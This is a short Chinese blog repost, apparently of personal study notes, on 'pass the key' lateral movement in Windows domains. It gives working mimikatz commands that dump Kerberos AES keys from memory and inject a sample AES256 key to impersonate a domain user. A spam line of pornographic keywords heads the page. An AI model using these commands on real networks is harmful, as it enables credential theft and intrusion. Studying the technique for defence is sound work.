日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 综合教程 >内容正文

综合教程

域渗透:ptk(pass the key)

發布時間:2023/12/29 综合教程 31 生活家
生活随笔 收集整理的這篇文章主要介紹了 域渗透:ptk(pass the key) 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

前言:自己還是不太懂,pass the key 和 pass the hash的區別,以后再看吧

在 WinXP/2003/Vista/2008 ,以及未打 kb2871997 補丁之前(AES 不可用或不可替代)的 Win7/2008r2/8/2012 中強制使用 NTLM 哈希。

AES 密鑰只有在 8.1/2012r2 和打了 kb2871997 補丁的 7/2008r2/8/2012 中才可以替換,在這種情況下,你可以避免使用 NTLM 哈希。

KB2871997:禁止本地管理員賬戶用于遠程連接,這樣就無法以本地管理員用戶的權限執行wmi、psexec、schtasks、at和訪問文件共享。

這個補丁發布后常規的Pass The Hash已經無法成功,唯獨默認的 Administrator (SID 500)賬號例外,利用這個賬號仍可以進行Pass The Hash遠程連接,即使administrator修改了名字

但是還可以通過AES密鑰來替代ntlm進行橫向的操作(自己講的也是一知半解的,這個自己只會用 不懂原理)


1、獲取aes key

mimikatz命令為:
mimikatz "log" "privilege::debug" "sekurlsa::ekeys" exit

2、注入aes key:

mimikatz命令為:
mimikatz "privilege::debug" "sekurlsa::pth /user:mary /domain:god.org /aes256:c4388a1fb9bd65a88343a32c09e53ba6c1ead4de8a17a442e819e98c522fc288"

這里需要注意:pth dir \xxx.xxx.xxx.xxxc$ 如果直接用IP會提示用戶或密碼不正確,直接使用機器名即可 dir \機器名c$

總結:對于8.1/2012r2,安裝補丁kb2871997的Win 7/2008r2/8/2012,可以使用AES keys代替NT hash

參考文章:http://blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash
參考文章:http://www.tiejiang.org/23508.html
參考文章:https://www.cnblogs.com/bmjoker/p/10355979.html

總結

以上是生活随笔為你收集整理的域渗透:ptk(pass the key)的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。